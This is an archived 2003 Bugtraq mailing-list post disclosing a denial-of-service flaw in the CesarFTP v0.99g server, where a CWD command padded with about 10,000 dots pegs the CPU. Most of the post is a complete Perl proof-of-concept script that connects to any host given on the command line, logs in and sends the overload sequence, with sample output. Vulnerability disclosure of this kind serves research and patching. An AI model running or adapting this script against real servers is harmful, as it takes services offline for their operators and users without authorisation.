lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 22 Dec 2003 02:59:15 -0000
From: zib zib <zibelette@....com>
To: bugtraq@...urityfocus.com
Subject: CesarFTP v0.99g CPU OverLoad [Proof of concept]




Description :
FTP server CesarFTP v0.99g has a security hole in the command CWD. This command allow somebody to rise up the CPU usage with the following command :

USER user
PASS pass
CWD ..................per 10000....

The CPU utilisation will be equal to 100%, the connection will not responding. This security hole has been tested on Windows XP. The version prior are probably affected too.

Proof of concept ...
--------cesar0.99g_dos.pl---------------------------------------------------

#!/usr/bin/perl -w
use IO::Socket;

########################################
#            _   _
#      ____ (_) | |__
#     |_  / | | | '_ \
#      / /  | | | |_) |
#     /___| |_| |_.__/
#
#   http://coding.romainl.com/
#
########################################
## 
########################################
## tested on CesarFTP 0.99g + WindowsXP Sp1
##
## server : 127.0.0.1
## user   : zib
## pass   : zib
##
##$ perl expl.pl localhost zib zib
##
##server : localhost
##user   : zib
##pass   : zib
##
##[~] prepare to connect...
##[+] connected
##[~] prepare to send data...
##[+] success
##[~] Send CPU Overload Sequence...
##[+] CPU Overload Sequence sent
##$
########################################

if (@ARGV < 3)
{
print "#############################################################\n";
print " CesarFTP 0.99g : CPU Overload\n";
print " by zib  http://coding.romainl.com/ \n";
print " 22/12/03\n";
print "#############################################################\n";
print " Usage:\n";
print " cesar0.99g_dos.pl <host> <user> <pass>\n";
print "\n";
print " <host> - host for attack\n";
print " <user> - a valid ftp user account, could be anonymous\n";
print " <pass> - pass for the login\n";
print "#############################################################";
exit();
}

$server = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];
$nb   = 10000;

print "\n";
print "server : $server\n";
print "user   : $user\n";
print "pass   : $pass\n";
print "\n";
$i = 0;
print "[~] prepare to connect...\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort 

=> "21") || 
die "[-] connect failed\n";
print "[+] connected\n";
print "[~] prepare to send data...\n";
print $socket "USER $user\n";
print $socket "PASS $pass\n";
print "[+] success\n";
print "[~] Send CPU Overload Sequence...\n";
print $socket "CWD ";
for($i=0;$i<=$nb;$i=$i+1)
{
 print $socket ".";
}
 print $socket "\n";

print "[+] CPU Overload Sequence sent\n";

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ